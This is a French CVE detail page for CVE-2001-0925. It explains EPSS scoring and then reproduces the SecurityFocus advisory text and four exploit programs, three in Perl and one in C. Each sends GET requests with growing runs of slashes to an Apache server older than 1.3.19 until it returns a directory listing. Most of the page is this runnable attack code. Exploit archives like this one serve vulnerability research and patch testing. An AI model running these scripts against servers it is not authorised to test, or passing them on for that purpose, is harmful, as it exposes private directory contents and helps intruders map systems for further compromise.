CVE-2001-0925 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

source: https://www.securityfocus.com/bid/2503/info Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems. A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents. This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. #!/usr/bin/perl # # orginal by farm9, Inc. (copyright 2001) # then modified by Siberian (www.sentry-labs.com) # with more modifications by rfp (www.wiretrip.net/rfp/) # ########################################################################## use libwhisker; use Getopt::Std; # apache3.pl # this exploit was modified to use the libwhisker library, which gives # HTTP/1.1, proxy, and SSL support. Plus, small other changes. $|++; my (%hin,%hout,%args); print "Apache Artificially Long Slash Path Directory Listing Exploit\n"; print "SecurityFocus BID 2503\n\n"; print "Original exploit code written by Matt Watchinski (www.farm9.com)\n"; print "Rewritten and fixed by Siberian (www.sentry-labs.com)\n"; print "Moved to libwhisker by rfp\n\n"; getopts("p:L:H:sP:R:h:",\%args); if($args{h} eq ''){ print 'Usage: ./apache3.pl <options>, where options:',"\n"; print '-h host host to scan (must be specified)',"\n"; print '-p ## host port (default: 80)',"\n"; print '-L ## low end/start of range (default: 1)',"\n"; print '-H ## high end/end of range (default: 8192)',"\n"; print '-P host HTTP proxy via host',"\n"; print '-R ## HTTP proxy port (default: 80)',"\n"; print '-s use SSL (can\'t be used with proxy)',"\n"; exit 0; } $low = $args{L} || 1; $high = $args{H} || 8192; &lw::http_init_request(\%hin); # setup our request hash $hin{'whisker'}->{'host'}= $args{h}; $hin{'whisker'}->{'port'}= $args{p} || 80; if(defined $args{s}){ $hin{'whisker'}->{'ssl'} = 1; if(defined $args{P}){ print "SSL not currently compatible with proxy\n"; exit 1; } } if(defined $args{'P'}){ $hin{'whisker'}->{'proxy_host'}=$args{P}; $hin{'whisker'}->{'proxy_port'}=$args{R} || 80; print "Using proxy host $hin{'whisker'}->{'proxy_host'} on "; print "port $hin{'whisker'}->{'proxy_port'}\n"; } &lw::http_fixup_request(\%hin); # fix any HTTP requirements for($c=$low; $c<=$high; $c++){ $hin{'whisker'}->{'uri'} = '/' x $c; if(&lw::http_do_request(\%hin,\%hout)){ print "Error: $hout{'whisker'}->{'error'}\n"; exit 1; } else { if($hout{'whisker'}->{'http_resp'} == 200 && $hout{'whisker'}->{'data'}=~/index of/i){ print "Found result using $c slashes.\n"; exit 0; } } print "."; # for status } print "\nNot vulnerable (perhaps try a different range).\n";

// source: https://www.securityfocus.com/bid/2503/info Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems. A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents. This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. /* Program: apacheslash.c Original Date: 2-21-02 Version: 1.0 Platform: Linux (compiled on SuSE 7.3) c0der: st0ic site: www.fsix.net e-mail: [email protected] Revised: NONE thus far Description: This program tests an Apache installation for the "Apache Artificially Long Slash Path Directory Listing Exploit." See SecurityFocus.com BID 2503 - http://online.securityfocus.com/bid/2503 Compile: gcc apacheslash.c -o apacheslash Stuff: I know theres already 3 Perl scripts that test this bug out, but there execution time is horrible so I was bored and decided to recode it in C for execution speed sake. On my box, I think it took about 8 mins to send 1000 /'s to apache with apache2.pl. It takes about 2 seconds with this program. BTW, SuSE 7.3 comes with Apache 1.3.20, which is NOT vulnerable :-). Check out the securityfocus.com BID 2503 to find out whats vulnerable and whats not. I also included the comments from apache2.pl exploit which was modified by Siberian of sentry-labs.com. Read below for the details: /************************************************* #!/usr/bin/perl # # orginal by farm9, Inc. (copyright 2001) # new modified code by Siberian (www.sentry-labs.com) # ######################################################################################## # # Note: This isn't the orginal exploit! This one was modified and partly rewritten. # # Changes: # # - help added (more user firendly :-) ) # - messages added # - exploit is now able to be executed on WinNT or 2k. # - uses perl version of BSD sockets (compatible to Windows) # # Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some # of the code and made it esaier to use and cross platform compatible. # The old verion used a esaier but not that compaible way of socket stream communication. # Any network code was replaced by cross platform compatible BSD sockets. # (much better than any other stream method :-) ) # # Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32) # # Original comment and source is attached below. # ######################################################################################## # # Name: Apache Artificially Long Slash Path Directory Listing Exploit # Author: Matt Watchinski # Ref: SecurityFocus BID 2503 # # Affects: Apache 1.3.17 and below # Tested on: Apache 1.3.12 running on Debian 2.2 # # Info: This exploit tricks apache into returning a Index of the a directory # even if an index.html file is present. May not work on some OS's # # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in # very specific cases would feed stat() a filename that was longer than # stat() could handle. This would result in a condition where stat() # would return 0 and a directory index would be returned instead of the # default index.html. # # Code Fragment: /src/main/http_request.c # if (strchr(new_file, '/') == NULL) { # char *udir = ap_make_dirstr_parent(rnew->pool, r->uri); # # rnew->uri = ap_make_full_path(rnew->pool, udir, new_file); # rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file); # ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */ /* # if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part # rnew->finfo.st_mode = 0; # } # # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled # The directory must also have the following Options enabled: # Indexes and MultiView # Some OS's have different conditions on the number of character # you have to pass to stat to make this work. If stat doesn't # return 0 for path names less than 8192 or so internal apache # buffer checks will stop this exploit from working. # # Debian needed around 4060 /'s to make this work. # # Greets: Special thanks to natasha who added a lot of debug to apache for me # while i was trying to figure out what had to be enabled to make this # exploit work. Also thanks to rfp for pointing out that MultiView # needed to be enabled. # # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us> # Anne for being so sexy <I never though corporate espionage # would be so fun> # All my homies at farm9 # DJ Charles / DJ NoloN for the phat beats # Marty (go go gadget snort) # All my ex-bees # RnVjazpIaXZlcndvcmxk # # I think that wraps it up. Have fun. -----snip snip---- **************************************************/ #include <stdio.h> #include <string.h> #include <errno.h> #include <stdlib.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <unistd.h> char tmp[10240]; char output[10240]; char *get = "GET "; char *slash = "/"; char *http = " HTTP/1.0\r\n"; char *end = "\r\n\r\n"; int c, x; int port; int low; int max; int sockfd; int bytes_recieved; int count; char *addr; struct sockaddr_in dest_addr; struct hostent *he; void usage(char *ptr) { fprintf(stderr, "\n\t%s <-h host> <-p port> <-l LOW> <-m MAX>", ptr); fprintf(stderr, "\n\tExample: %s -h 127.0.0.1 -p 80 -l 1 -m 1000\n", ptr); fprintf(stderr, "\n\tLOW is how many /'s to start with and MAX is how many /'s to end with.\n\n"); exit(1); } int main(int argc, char *argv[]) { printf("\n\t[ apacheslash.c ]"); printf("\n\t[ c0ded by st0ic ]"); printf("\n\t[ Fsix.Net ]"); printf("\n\t[ [email protected] ]\n\n"); while ( ( c = getopt(argc, argv, "h:p:l:m:") ) != -1) { switch(c) { case 'h': { addr = optarg; break; } case 'p': { port = atoi(optarg); break; } case 'l': { low = atoi(optarg); break; } case 'm': { max = atoi(optarg); break; } default: usage(argv[0]); } } if ( low > max || addr == NULL ) usage(argv[0]); if ( (he = gethostbyname(addr)) == NULL) { perror("gethostbyname"); exit(1); } dest_addr.sin_family = AF_INET; dest_addr.sin_addr = *( (struct in_addr *) he->h_addr); dest_addr.sin_port = htons(port); memset (&dest_addr.sin_zero, 0, 8); printf("\t\n....Working....\n"); while (low <= max) { count = low; bzero(tmp, sizeof(tmp) ); if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0) ) == -1) { perror("socket"); break; } if (connect (sockfd, (struct sockaddr_in *) &dest_addr, sizeof(dest_addr) ) == -1) { perror("connect"); exit(1); } strcpy(tmp, get); /* copy the necessary slashes. */ for(x = 0; x < count; x++) strcat(tmp, slash); strcat(tmp, http); strcat(tmp, end); send(sockfd, tmp, sizeof(tmp), 0); bytes_recieved = 1; while(bytes_recieved > 0) { bytes_recieved = recv(sockfd, output, sizeof(output), 0); if ( (strstr(output, "Index of") ) != NULL) { printf("\n\tNumber of \"/\"'s required to generate a directory listing = %d\n", low); close(sockfd); exit(0); } } low++; close(sockfd); } printf("\nHost does not appear to be vulnerable. Maybe try some different numbers...\n"); return 0; }

source: https://www.securityfocus.com/bid/2503/info Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems. A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents. This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. #!/usr/bin/perl # # farm9, Inc. (copyright 2001) # # Name: Apache Artificially Long Slash Path Directory Listing Exploit # Author: Matt Watchinski # Ref: SecurityFocus BID 2503 # # Affects: Apache 1.3.17 and below # Tested on: Apache 1.3.12 running on Debian 2.2 # # Info: This exploit tricks apache into returning a Index of the a directory # even if an index.html file is present. May not work on some OS's # # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in # very specific cases would feed stat() a filename that was longer than # stat() could handle. This would result in a condition where stat() # would return 0 and a directory index would be returned instead of the # default index.html. # # Code Fragment: /src/main/http_request.c # if (strchr(new_file, '/') == NULL) { # char *udir = ap_make_dirstr_parent(rnew->pool, r->uri); # # rnew->uri = ap_make_full_path(rnew->pool, udir, new_file); # rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file); # ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */ # if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part # rnew->finfo.st_mode = 0; # } # # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled # The directory must also have the following Options enabled: # Indexes and MultiView # Some OS's have different conditions on the number of character # you have to pass to stat to make this work. If stat doesn't # return 0 for path names less than 8192 or so internal apache # buffer checks will stop this exploit from working. # # Debian needed around 4060 /'s to make this work. # # Greets: Special thanks to natasha who added a lot of debug to apache for me # while i was trying to figure out what had to be enabled to make this # exploit work. Also thanks to rfp for pointing out that MultiView # needed to be enabled. # # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us> # Anne for being so sexy <I never though corporate espionage # would be so fun> # All my homies at farm9 # DJ Charles / DJ NoloN for the phat beats # Marty (go go gadget snort) # All my ex-bees # RnVjazpIaXZlcndvcmxk # # I think that wraps it up. Have fun. # # Usage: ./apacheIndex.pl <host> <port> <HI> <Low> # Where: Hi and low are the range for the number of / to try # use IO::Socket; $low = $ARGV[3]; #Low number of slash characters to try $hi = $ARGV[2]; #High number of slash characters to try $port = $ARGV[1]; #Port to try to connect to $host = $ARGV[0]; #Host to try to connect to # Main loop. Not much to this exploit once you figure out what needed to # be enabled. Need to do some more testing on sub-dirs to see if it # works with them. It should. Also different OS's might use a different number # of /. Send me the numbers if you don't mind [email protected] while($low <= $hi) { $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed"; $url = ""; $buffer = ""; $end = ""; $url = "GET "; $buffer = "/" x $low . " HTTP/1.0\r\n"; $end = "\r\n\r\n"; $url = $url . $buffer . $end; print $socket "$url"; while(<$socket>) { if($_ =~ "Index of") { print "Found the magic number: $low\n"; print "Now go do it by hand to to see it all\n"; close($socket); exit; } } close($socket); $low++; }

source: https://www.securityfocus.com/bid/2503/info Apache HTTPD is the Apache Web Server, freely distributed and actively maintained by the Apache Software Foundation. It is a freely available and widely used software package, included with various implementations of the UNIX operating system and can be used on Microsoft Windows operating systems. A problem in the package could allow directory indexing and path discovery. In a default configuration, Apache enables mod_dir, mod_autoindex, and mod_negotiation. However, by sending the Apache server a custom-crafted request consisting of a long path name created artificially by using numerous slashes, an attacker can cause these modules to misbehave, allowing the attacker to escape the error page and to gain a listing of the directory contents. This vulnerability allows a malicious remote user to launch an information-gathering attack, which could potentially result in a compromise of the system. Additionally, this vulnerability affects all releases of Apache previous to 1.3.19. #!/usr/bin/perl # # orginal by farm9, Inc. (copyright 2001) # new modified code by Siberian (www.sentry-labs.com) # ######################################################################################## # # Note: This isn't the orginal exploit! This one was modified and partly rewritten. # # Changes: # # - help added (more user firendly :-) ) # - messages added # - exploit is now able to be executed on WinNT or 2k. # - uses perl version of BSD sockets (compatible to Windows) # # Rewriter's Note: I rewrote (I was bored to death that evening :-) ) some # of the code and made it esaier to use and cross platform compatible. # The old verion used a esaier but not that compaible way of socket stream communication. # Any network code was replaced by cross platform compatible BSD sockets. # (much better than any other stream method :-) ) # # Tested with Perl 5.6 (Linux) and ActivePerl 5.6 (Win32) # # Original comment and source is attached below. # ######################################################################################## # # Name: Apache Artificially Long Slash Path Directory Listing Exploit # Author: Matt Watchinski # Ref: SecurityFocus BID 2503 # # Affects: Apache 1.3.17 and below # Tested on: Apache 1.3.12 running on Debian 2.2 # # Info: This exploit tricks apache into returning a Index of the a directory # even if an index.html file is present. May not work on some OS's # # Details: http_request.c has a subroutine called ap_sub_req_lookup_file that in # very specific cases would feed stat() a filename that was longer than # stat() could handle. This would result in a condition where stat() # would return 0 and a directory index would be returned instead of the # default index.html. # # Code Fragment: /src/main/http_request.c # if (strchr(new_file, '/') == NULL) { # char *udir = ap_make_dirstr_parent(rnew->pool, r->uri); # # rnew->uri = ap_make_full_path(rnew->pool, udir, new_file); # rnew->filename = ap_make_full_path(rnew->pool, fdir, new_file); # ap_parse_uri(rnew, rnew->uri); /* fill in parsed_uri values */ # if (stat(rnew->filename, &rnew->finfo) < 0) { <-- Important part # rnew->finfo.st_mode = 0; # } # # Conditions: Mod_dir / Mod_autoindex / Mod_negotiation need to be enabled # The directory must also have the following Options enabled: # Indexes and MultiView # Some OS's have different conditions on the number of character # you have to pass to stat to make this work. If stat doesn't # return 0 for path names less than 8192 or so internal apache # buffer checks will stop this exploit from working. # # Debian needed around 4060 /'s to make this work. # # Greets: Special thanks to natasha who added a lot of debug to apache for me # while i was trying to figure out what had to be enabled to make this # exploit work. Also thanks to rfp for pointing out that MultiView # needed to be enabled. # # More Greets: Jeff for not shooting me :) <All your Cisco's belong to us> # Anne for being so sexy <I never though corporate espionage # would be so fun> # All my homies at farm9 # DJ Charles / DJ NoloN for the phat beats # Marty (go go gadget snort) # All my ex-bees # RnVjazpIaXZlcndvcmxk # # I think that wraps it up. Have fun. # # Usage: ./apacheIndex.pl <host> <port> <HI> <Low> # Where: Hi and low are the range for the number of / to try # #use IO::Socket; # #$low = $ARGV[3]; #Low number of slash characters to try #$hi = $ARGV[2]; #High number of slash characters to try #$port = $ARGV[1]; #Port to try to connect to #$host = $ARGV[0]; #Host to try to connect to # # Main loop. Not much to this exploit once you figure out what needed to # be enabled. Need to do some more testing on sub-dirs to see if it # works with them. It should. Also different OS's might use a different number # of /. Send me the numbers if you don't mind [email protected] # #while($low <= $hi) #{ # #$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "TCP") or die "Connect Failed"; # # $url = ""; # $buffer = ""; # $end = ""; # # $url = "GET "; # $buffer = "/" x $low . " HTTP/1.0\r\n"; # $end = "\r\n\r\n"; # # $url = $url . $buffer . $end; # # print $socket "$url"; # while(<$socket>) # { # if($_ =~ "Index of") # { # print "Found the magic number: $low\n"; # print "Now go do it by hand to to see it all\n"; # close($socket); # exit; # } # } # # close($socket); # $low++; #} use Socket; print "Apache Artificially Long Slash Path Directory Listing Exploit\nSecurityFocus BID 2503\n\n"; print "original exploit code written by Matt Watchinski (www.farm9.com)\n"; print "rewritten and fixed by Siberian (www.sentry-labs.com)\n\n"; $host = shift || 'localhost'; #Host to try to connect to $port = shift || '80'; #Port to try to connect to $hi = shift || '100'; #High number of slash characters to try $low = shift || '0'; #Low number of slash characters to try if(($host eq 'localhost') && ($port eq '80') && ($hi eq '100') && ($low eq '0')) { print 'Usage: ./apache2.pl <host> <port> <HI> <Low>'; print "\nHi and low are the range for the number of \/ to try\n"; exit 0; } print "\ntarget: $host"; print "\nport: $port"; print "\nhi: $hi"; print "\nlow: $low\n\nStarting attack...\n\n"; # Main loop. Not much to this exploit once you figure out what needed to # be enabled. Need to do some more testing on sub-dirs to see if it # works with them. It should. Also different OS's might use a different number # of /. Send me the numbers if you don't mind [email protected] $url = ""; $buffer = ""; $end = ""; #$port = (getservbyname($port, 'tcp') || die "No port!"); $iaddr = inet_aton($host); $paddr = sockaddr_in($port, $iaddr) or die "Faild ... SOCKADDR_IN!"; $proto = getprotobyname('tcp'); while($low <= $hi) { socket(SOCKY, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; connect(SOCKY, $paddr ) or die "connect: $!";; $url = "GET "; $buffer = "/" x $low . " HTTP/1.0\r\n"; $end = "\r\n\r\n"; $url = $url . $buffer . $end; print "."; send(SOCKY,$url,0) or die "send: $!";; while((recv(SOCKY,$out,1,0)) && ($out ne "")) { if($out eq "I") { recv(SOCKY,$out,1,0); if($out eq "n") { recv(SOCKY,$out,1,0); if($out eq "d") { recv(SOCKY,$out,1,0); if($out eq "e") { recv(SOCKY,$out,1,0); if($out eq "x") { recv(SOCKY,$out,1,0); if($out eq " ") { recv(SOCKY,$out,1,0); if($out eq "o") { recv(SOCKY,$out,1,0); if($out eq "f") { print "Found the magic number: $low\n"; print "Now go do it by hand to to see it all\n"; close(SOCKY); exit 0; } } } } } } } } } close(SOCKY); $low++; } print "\n\nNot vulnerable :-(\nCheck some other numbers.\n";